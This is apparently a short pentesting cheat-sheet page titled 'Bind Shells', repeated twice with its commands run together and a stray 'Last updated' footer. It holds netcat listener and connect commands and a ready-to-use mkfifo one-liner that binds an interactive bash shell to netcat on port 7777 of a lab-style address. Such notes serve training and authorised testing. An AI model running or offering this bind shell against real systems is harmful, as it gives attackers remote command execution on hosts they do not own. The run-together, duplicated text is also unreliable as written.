Bind Shells
sudo nc -lvnp <port #>nc -nv <ip address of computer with listener started><port being listened on>rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/fLast updated
sudo nc -lvnp <port #>nc -nv <ip address of computer with listener started><port being listened on>rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/fLast updated